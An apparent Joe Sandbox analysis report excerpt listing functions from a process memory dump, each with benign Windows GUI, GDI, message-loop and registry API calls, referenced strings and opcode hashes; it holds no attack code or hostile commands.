GetWindowLongA.USER32(00000000,000000F4), ref: 02D4E68B
SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 02D4E69E

Strings

@, xrefs: 02D4E571

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: ClassLongWindow$InfoRegisterUnregister
String ID: @
API String ID: 717780171-2766056989
Opcode ID: 75cda95346adaeca2ae74bcb960c9b8379e667ab96e43c79d3208552ae30ce82
Instruction ID: 045634387476c7c5d3194f5f4c0205e51563178360f0d4eeed7842e3a26c1f0d
Opcode Fuzzy Hash: 75cda95346adaeca2ae74bcb960c9b8379e667ab96e43c79d3208552ae30ce82
Instruction Fuzzy Hash: 8A512870A00354ABEB20EBA8DC84B9AB7EAFB45308F1049A5A845D7791DB30ED45CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02D3AFC4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68stringCOMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32(?,?), ref: 02D3AFF5
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 02D3B01C
GetSystemMetrics.USER32(00000000), ref: 02D3B031
GetSystemMetrics.USER32(00000001), ref: 02D3B03C
lstrcpyA.KERNEL32(?,DISPLAY), ref: 02D3B066

Part of subcall function 02D3AC98: GetProcAddress.KERNEL32(75BD0000,00000000), ref: 02D3AD17

Strings

DISPLAY, xrefs: 02D3B05D
GetMonitorInfo, xrefs: 02D3AFDC

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfo
API String ID: 1539801207-1633989206
Opcode ID: daa4d1012f6026616964d3a32e54977f3f336296da7ba9bdb0c01b03ee38a58b
Instruction ID: 9801bc1a10a6d6ef69cea57a7adaf5d407ee5420a091d3d57e8d6f3b09f95ebd
Opcode Fuzzy Hash: daa4d1012f6026616964d3a32e54977f3f336296da7ba9bdb0c01b03ee38a58b
Instruction Fuzzy Hash: 9B11D371A417045FE3218F64DC45BA7B7EAFB06718F10492AEC66D7750D7B0AC04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D14608 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D146CF,?,?,02DAC7C8,?,?,02D7A7AC,02D168FD,02D79751), ref: 02D14641
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D146CF,?,?,02DAC7C8,?,?,02D7A7AC,02D168FD,02D79751), ref: 02D14647
GetStdHandle.KERNEL32(000000F5,02D14690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D146CF,?,?,02DAC7C8), ref: 02D1465C
WriteFile.KERNEL32(00000000,000000F5,02D14690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D146CF,?,?), ref: 02D14662
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02D14680

Strings

Error, xrefs: 02D14674
Runtime error at 00000000, xrefs: 02D1463A, 02D14679

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 03c0ba50166b61056e67cb3aef83b8fb13b36730036f0863304984b2ecf24967
Instruction ID: 5ef8b6d499d74a109534d0c2938993a167245b68f705fc7210c2e0caa5a2025a
Opcode Fuzzy Hash: 03c0ba50166b61056e67cb3aef83b8fb13b36730036f0863304984b2ecf24967
Instruction Fuzzy Hash: 9FF04960A843C078F620A250BC17FDD27789744B28F608B08B21898BC1E7A88C98CE36

Uniqueness

Uniqueness Score: -1.00%

Function 02D65E7C Relevance: 12.2, APIs: 8, Instructions: 170windowCOMMON

Download Yara Rule

APIs

ImageList_DrawEx.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 02D65EDB
ImageList_DrawEx.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 02D65F7C
SetTextColor.GDI32(00000000,00FFFFFF), ref: 02D65FC9
SetBkColor.GDI32(00000000,00000000), ref: 02D65FD1
BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 02D65FF6

Part of subcall function 02D65E54: ImageList_GetBkColor.COMCTL32(00000000,?,02D65EB5,00000000,?), ref: 02D65E6A

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: ColorImageList_$Draw$Text
String ID:
API String ID: 2027629008-0
Opcode ID: 1f50e409bfb86ccfc617cc699d8ae46c1afb8e10981f0ae7ebeb5deaf32f83f1
Instruction ID: 327b06a542d97e06d6b2172f3bcd138c32a6a67df435033b7eae48b4ef391802
Opcode Fuzzy Hash: 1f50e409bfb86ccfc617cc699d8ae46c1afb8e10981f0ae7ebeb5deaf32f83f1
Instruction Fuzzy Hash: 2E51F371600204ABDB51EF68DD85FAE37AEEF08710F500161FA04EB386CA74ED558BB5

Uniqueness

Uniqueness Score: -1.00%

Function 02D60650 Relevance: 12.2, APIs: 8, Instructions: 154windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 02D606C1
GetCapture.USER32 ref: 02D606D0
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 02D606D6
ReleaseCapture.USER32 ref: 02D606DB
GetActiveWindow.USER32 ref: 02D6072C
SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 02D607C2
SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 02D6082F
GetActiveWindow.USER32 ref: 02D6083E

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release
String ID:
API String ID: 862346643-0
Opcode ID: fbff05903c8bf10093beb657bfc7c088086d12cfe48e53c3682ed1c755f0c046
Instruction ID: 4381664408fbe6f231b513f97d307acf779b63dbf648e53208bd05600ef0975a
Opcode Fuzzy Hash: fbff05903c8bf10093beb657bfc7c088086d12cfe48e53c3682ed1c755f0c046
Instruction Fuzzy Hash: 10513534A40244AFEB15EFA8D989FADB7E6FF49700F1544A4E404AB761CB74AE40CF60

Uniqueness

Uniqueness Score: -1.00%

Function 02D4FD08 Relevance: 12.1, APIs: 8, Instructions: 136COMMON

Download Yara Rule

APIs

SaveDC.GDI32(?), ref: 02D4FD25

Part of subcall function 02D48B20: GetWindowOrgEx.GDI32(00000000), ref: 02D48B2E
Part of subcall function 02D48B20: SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 02D48B44

IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 02D4FD5E
GetWindowLongA.USER32(00000000,000000EC), ref: 02D4FD72
GetWindowLongA.USER32(00000000,000000F0), ref: 02D4FD93
SetRect.USER32(?,00000000,00000000,?,?), ref: 02D4FDC3
DrawEdge.USER32(?,?,00000000,00000000), ref: 02D4FDD2
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 02D4FDFB
RestoreDC.GDI32(?,?), ref: 02D4FE7A

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
String ID:
API String ID: 2976466617-0
Opcode ID: 2f1204603e729193f7fa3eb171466fd53d83b179963495c1e2946610150517ba
Instruction ID: e03a296f220ee8e5e939e0d5bd563198c457623024f3acc705eb834df0a6fc75
Opcode Fuzzy Hash: 2f1204603e729193f7fa3eb171466fd53d83b179963495c1e2946610150517ba
Instruction Fuzzy Hash: 1841F075A00209AFEB10DBD8C985F9EB7B9EF48700F1141A4BA14E77A1DB75ED41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02D63B68 Relevance: 12.1, APIs: 8, Instructions: 99windowthreadCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 02D63B8E
IsWindowUnicode.USER32(00000000), ref: 02D63BD1
SendMessageW.USER32(00000000,-0000BBEE,114967A0,?), ref: 02D63BEC
SendMessageA.USER32(00000000,-0000BBEE,114967A0,?), ref: 02D63C0B
GetWindowThreadProcessId.USER32(00000000), ref: 02D63C1A
GetWindowThreadProcessId.USER32(?,?), ref: 02D63C28
SendMessageA.USER32(00000000,-0000BBEE,114967A0,?), ref: 02D63C48

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: MessageSendWindow$ProcessThread$CaptureUnicode
String ID:
API String ID: 1994056952-0
Opcode ID: a4ae101467cb1dd1b99b23d696890ec2445bed14a3a03bc71d12dfff41a2711d
Instruction ID: 12da2b83ed2afc058957d2b053215bd980c01aa0e9a65c62e09388bdd055dc9e
Opcode Fuzzy Hash: a4ae101467cb1dd1b99b23d696890ec2445bed14a3a03bc71d12dfff41a2711d
Instruction Fuzzy Hash: 25214B712046096FA7A0FA5DDD84F67B3DEDB04750F1584A8B99AC3741DB60FC508BB0

Uniqueness

Uniqueness Score: -1.00%

Function 02D33A3C Relevance: 12.1, APIs: 8, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 02D33A6A
GetDeviceCaps.GDI32(?,00000068), ref: 02D33A86
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 02D33AA5
GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 02D33AC9
GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 02D33AE7
GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 02D33AFB
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 02D33B1B
ReleaseDC.USER32(00000000,?), ref: 02D33B33

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: EntriesPaletteSystem$CapsDeviceRelease
String ID:
API String ID: 1781840570-0
Opcode ID: fef5e24df29962db2565007f4e528dc5c9d13f512b244fe6e5552e9964e9ded4
Instruction ID: 9a1782f89097ed121eb06abda6b1aafea1de8d9ebedf27088689cc3d3aa550a3
Opcode Fuzzy Hash: fef5e24df29962db2565007f4e528dc5c9d13f512b244fe6e5552e9964e9ded4
Instruction Fuzzy Hash: 4B2162B1A40318FAEB50EBA5DD85FAEB3BDEB08704F500491F708E7680D675AE448B74

Uniqueness

Uniqueness Score: -1.00%

Function 02D3F948 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 177windowCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,02D3FB99), ref: 02D3F9E4
InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 02D3FAED

Part of subcall function 02D3FE4C: CreatePopupMenu.USER32 ref: 02D3FE67

InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 02D3FB76

Part of subcall function 02D3FE4C: CreateMenu.USER32 ref: 02D3FE71

InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 02D3FB5D

Strings

?, xrefs: 02D3F9FF
,, xrefs: 02D3F9F8

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Menu$Insert$Create$ItemPopupVersion
String ID: ,$?
API String ID: 2359071979-2308483597
Opcode ID: 95e4368b613353e5c34a7553cf1afe87ad9cf433f6773369162ec6fd05a66640
Instruction ID: 43996ede2fc21b2df13807518738dd53507ef820e2efff5293155ffd4faca276
Opcode Fuzzy Hash: 95e4368b613353e5c34a7553cf1afe87ad9cf433f6773369162ec6fd05a66640
Instruction Fuzzy Hash: DA61D330E04258AFDB51EF68E880AAA77F6EF05304F4444A6E880D7796D739DD45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 02D536B4 Relevance: 10.7, APIs: 7, Instructions: 162COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,02D53898), ref: 02D53799
GetTickCount.KERNEL32 ref: 02D5379E
SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 02D537E2
SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 02D537FA
AnimateWindow.USER32(00000000,00000064,?), ref: 02D5383F
ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,02D53898), ref: 02D53862

Part of subcall function 02D56E74: GetCursorPos.USER32(?), ref: 02D56E78

GetTickCount.KERNEL32 ref: 02D5387F

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
String ID:
API String ID: 3024527889-0
Opcode ID: 9747d04b9557d63296e7f5e7967342501764f7243f3c7bbfcbb936dceb2fab74
Instruction ID: dbf6903ced10a5a207b15d2a7d8c8ec55db65fecb507f3c66b358e693643e144
Opcode Fuzzy Hash: 9747d04b9557d63296e7f5e7967342501764f7243f3c7bbfcbb936dceb2fab74
Instruction Fuzzy Hash: 88510574A00209EFDB50DFA8C985AAEB7F6EB44344F2045A1E944EB350D7B5EE44CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D640A8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 138windowCOMMON

Download Yara Rule

APIs

Part of subcall function 02D65454: GetActiveWindow.USER32 ref: 02D6547B
Part of subcall function 02D65454: GetLastActivePopup.USER32(?), ref: 02D6548D

GetWindowRect.USER32(?,?), ref: 02D6412A
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 02D64162
MessageBoxA.USER32(00000000,?,?,?), ref: 02D641A1
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,02D64217), ref: 02D641F1
SetActiveWindow.USER32(00000000,02D64217), ref: 02D64202

Strings

(, xrefs: 02D64107

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Window$Active$LastMessagePopupRect
String ID: (
API String ID: 3456420849-3887548279
Opcode ID: e6bccbe0b66366ecc40e62256bc9248d6b535e82835baba8031970e153d6649b
Instruction ID: 86c859747f5a0da87c680478bb97d9c05ea2ae54394fcd8acc4fda181314ddf6
Opcode Fuzzy Hash: e6bccbe0b66366ecc40e62256bc9248d6b535e82835baba8031970e153d6649b
Instruction Fuzzy Hash: 1E51E375E00208AFEB14DBA8DC95FAEB7B9EB88300F144468F915AB795D774AD008B60

Uniqueness

Uniqueness Score: -1.00%

Function 02D61984 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125registryCOMMON

Download Yara Rule

APIs

GetKeyboardLayoutList.USER32(00000040,?,00000000,02D61B2F,?,1149D9D0,?,02D61B91,00000000,?,02D4D1DB), ref: 02D619DA
RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 02D61A42
RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,02D61AEB,?,80000002,00000000), ref: 02D61A7C
RegCloseKey.ADVAPI32(?,02D61AF2,00000000,?,00000100,00000000,02D61AEB,?,80000002,00000000), ref: 02D61AE5

Strings

System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 02D61A2C
layout text, xrefs: 02D61A73

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CloseKeyboardLayoutListOpenQueryValue
String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
API String ID: 1703357764-2652665750
Opcode ID: c32e5977ddc6a99322f922cc3bc6f2833e1bb51e51bf1686b06dae91436bf932
Instruction ID: ce0fde3cd756c07a4ffcc145f4c304962a637beaf47cc44a990f0bfa51d66efb
Opcode Fuzzy Hash: c32e5977ddc6a99322f922cc3bc6f2833e1bb51e51bf1686b06dae91436bf932
Instruction Fuzzy Hash: AB414774A04259AFEB10DFA8D984BAEB7F9EB49300F5140A1E908E7750E771EE44CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02D63D98 Relevance: 10.6, APIs: 7, Instructions: 105windowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 02D63DAC
IsWindowUnicode.USER32 ref: 02D63DC0
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02D63DE1
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 02D63DF7
TranslateMessage.USER32 ref: 02D63E80
DispatchMessageW.USER32 ref: 02D63E8C
DispatchMessageA.USER32 ref: 02D63E94

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
String ID:
API String ID: 2190272339-0
Opcode ID: 6ed8b3b5d4f4a2989b04b0a5b673ecf97813dc2a6aef7c232c355a642e2ba653
Instruction ID: e3894b9200fac66357708055452c974a741df7b932b7086ea33a12e7ce4cefcc
Opcode Fuzzy Hash: 6ed8b3b5d4f4a2989b04b0a5b673ecf97813dc2a6aef7c232c355a642e2ba653
Instruction Fuzzy Hash: F421F62034438037EB713A6A5D48BBA969A8FA2F08F1485D9F5C1A73D2C7A59C46C632

Uniqueness

Uniqueness Score: -1.00%

Function 02D5D09C Relevance: 10.6, APIs: 7, Instructions: 97COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(00000000,000000F0), ref: 02D5D10D
GetWindowLongA.USER32(00000000,000000EC), ref: 02D5D11F
GetClassLongA.USER32(00000000,000000E6), ref: 02D5D132
SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02D5D172
SetWindowLongA.USER32(00000000,000000EC,?), ref: 02D5D186
SetClassLongA.USER32(00000000,000000E6,?), ref: 02D5D19A
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000233,00000000,000000E6,?,00000000,000000EC,?,00000000,000000F0,00000000), ref: 02D5D1B6

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Long$Window$Class
String ID:
API String ID: 2026531576-0
Opcode ID: 507e2d1fef2c9bf884573e4323104b717f34c8899bab19ef83a253cc214c9ba8
Instruction ID: eb71457dd03c1067436d1b463fa78982deeeef66b260c599af608d105134679f
Opcode Fuzzy Hash: 507e2d1fef2c9bf884573e4323104b717f34c8899bab19ef83a253cc214c9ba8
Instruction Fuzzy Hash: ED214F7020826276DE02B77C9C48BAFB69B9F81354F184614BCA4977E0CBB4DD46DB72

Uniqueness

Uniqueness Score: -1.00%

Function 02D61CD0 Relevance: 10.6, APIs: 7, Instructions: 89COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 02D61D25
CreateFontIndirectA.GDI32(?), ref: 02D61D32
GetStockObject.GDI32(0000000D), ref: 02D61D48

Part of subcall function 02D3250C: MulDiv.KERNEL32(00000000,?,00000048), ref: 02D32519

SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 02D61D71
CreateFontIndirectA.GDI32(?), ref: 02D61D81
CreateFontIndirectA.GDI32(?), ref: 02D61D9A
GetStockObject.GDI32(0000000D), ref: 02D61DC0

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CreateFontIndirect$InfoObjectParametersStockSystem
String ID:
API String ID: 2891467149-0
Opcode ID: 2d2dfe7e2c8110122871b8e99dcbe78f775e728d3f2a9e09f4f8a8e6de56eaac
Instruction ID: 2124e2f2f39f0bc03d2fef44b873b3a15b2980ba9fcee000dee96f3cfcf8992f
Opcode Fuzzy Hash: 2d2dfe7e2c8110122871b8e99dcbe78f775e728d3f2a9e09f4f8a8e6de56eaac
Instruction Fuzzy Hash: E831A130B44244ABE755EBA9E849BA937EAEB44304F4440B0E94CDB795DA74DC45CF30

Uniqueness

Uniqueness Score: -1.00%

Function 02D66C1C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 02D1C92C: GetFileVersionInfoSizeA.VERSION(00000000,?,00000000,02D1CA02), ref: 02D1C96E
Part of subcall function 02D1C92C: GetFileVersionInfoA.VERSION(00000000,?,00000000,?,00000000,02D1C9E5,?,00000000,?,00000000,02D1CA02), ref: 02D1C9A3
Part of subcall function 02D1C92C: VerQueryValueA.VERSION(?,02D1CA14,?,?,00000000,?,00000000,?,00000000,02D1C9E5,?,00000000,?,00000000,02D1CA02), ref: 02D1C9BD

GetModuleHandleA.KERNEL32(comctl32.dll), ref: 02D66C50
GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 02D66C61
ImageList_Write.COMCTL32(00000000,?,00000000,02D66D16), ref: 02D66CE0

Strings

comctl32.dll, xrefs: 02D66C4B
ImageList_WriteEx, xrefs: 02D66C5B
comctl32.dll, xrefs: 02D66C30

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: FileInfoVersion$AddressHandleImageList_ModuleProcQuerySizeValueWrite
String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
API String ID: 4063495462-3125200627
Opcode ID: c079a66262e37952e085c6fac035cfd846955de86caa0a7dae596b8bc3aa4143
Instruction ID: 013613bd54b711d81222564f126aac6f3c21f95164762d2e985ec634560b5be9
Opcode Fuzzy Hash: c079a66262e37952e085c6fac035cfd846955de86caa0a7dae596b8bc3aa4143
Instruction Fuzzy Hash: 7921AC30A80640ABE714AF7AA898F7A37AEEB51744F510824F802D7B40DB79DC54CEB1

Uniqueness

Uniqueness Score: -1.00%

Function 02D42FB4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetKeyboardLayoutNameA.USER32(00000000), ref: 02D42FDC

Part of subcall function 02D30298: RegCloseKey.ADVAPI32(10940000,02D30174,00000001,02D30216,?,?,02D376AE,00000008,00000060,00000048,00000000,02D37753), ref: 02D302AC

Part of subcall function 02D302FC: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,02D30496), ref: 02D30368

